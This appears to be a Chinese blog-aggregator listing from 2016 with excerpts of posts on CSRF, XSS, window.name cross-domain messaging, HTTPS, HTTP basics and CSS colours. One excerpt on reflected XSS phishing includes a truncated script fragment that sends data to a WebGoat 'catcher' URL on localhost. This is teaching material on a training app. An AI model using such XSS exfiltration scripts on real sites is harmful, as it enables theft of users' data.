10.层叠 CSS2.1层叠规则 11. 颜色的十六进制记法和RGB记法:#336680对应rgb{rr,gg,bb}即把十六进制转化为十进制 十六进制的简单记法#ccc等价于rgb{cc,cc,cc} web安全色:在256色计算机系统上能避免抖动的颜色 rgb表示的话就是20%和51的倍数 十六 ...
分类:
Web程序 时间:
2016-11-17 18:10:29
阅读次数:
255
CSRF是什么? CSRF(Cross Site Request Forgery),中文是跨站点请求伪造。CSRF攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。 举个例子 简单版: 假如博客园 ...
分类:
Web程序 时间:
2016-11-09 11:23:21
阅读次数:
233
页面A:页面B,你能传个数据给我吗? 页面B:额,我们不在同一个域内,因为涉及到WEB安全问题,所以浏览器禁止我直接向你传数据。 页面A:有什么办法可以解决这个问题吗? 页面B:可以使用window.name。 页面A:那你需要我做些什么? 页面B:1.你先动态创建一个iframe节点; 2.设置节 ...
Web安全XSS Web安全XSS 简单的反射型XSS钓鱼演示 </form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes ...
分类:
Web程序 时间:
2016-11-08 19:37:05
阅读次数:
208
CSRF是什么? Cross Site Request Forgery,中文是:跨站点请求伪造。 CSRF攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。 举个例子 简单版: 假如博客园有个加关 ...
分类:
Web程序 时间:
2016-11-06 13:41:21
阅读次数:
255
关注云层天咨有助于升职加薪噢!云 知道比某知道更专业靠谱的知识分享平台关键词:认知web安全测试 不再懵安全测试话题很大,是一个带有深度且涉及范围很广的内容,但是可以先缩小一下范围,让更多的人能简单的去理解什么是web安全测试,这也是最基础的安全之一。最常见的web应用攻击技术跨站脚本攻击跨站脚本攻 ...
分类:
其他好文 时间:
2016-11-06 13:37:50
阅读次数:
272
确保Web安全的HTTPS在HTTP协议中有可能存在信息窃听或者身份伪装等问题。使用HTTPS通信机制可以有效地防止这类问题。本篇着重介绍下HTTPS7.1HTTP的缺点到现在为止,我们已经了解到HTTP具有相当优秀和方便的一面,然而HTTP并非只有好的一面,事物皆具有两面性,HTTP也具有不足之处。..
分类:
Web程序 时间:
2016-11-01 21:35:38
阅读次数:
300
转载:http://www.51testing.com/html/44/15020244-908645.html Web安全测试之XSS Web安全测试之XSS XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如 ...
分类:
Web程序 时间:
2016-11-01 11:26:22
阅读次数:
267
Web浏览器、服务器和相关的Web应用程序都是通过HTTP相互通信的。HTTP是现代全球因特网中使用的公共语言。 1.1HTTP – 因特网的多媒体信使 HTTP使用的是可靠的数据传输协议,确保数据在传输的过程中不会被破坏或产生混乱。 1.2 Web客户端和服务器 Web 内容是存储在Web服务器上 ...
分类:
Web程序 时间:
2016-10-30 13:44:56
阅读次数:
252
0×01 前言: 《xss攻击手法》一开始在互联网上资料并不多(都是现成的代码,没有从基础的开始),直到刺的《白帽子讲WEB安全》和cn4rry的《XSS跨站脚本攻击剖析与防御》才开始好转。 我这里就不说什么xss的历史什么东西了,xss是一门又热门又不太受重视的Web攻击手法,为什么会这样呢,原因 ...
分类:
其他好文 时间:
2016-10-27 01:11:57
阅读次数:
227
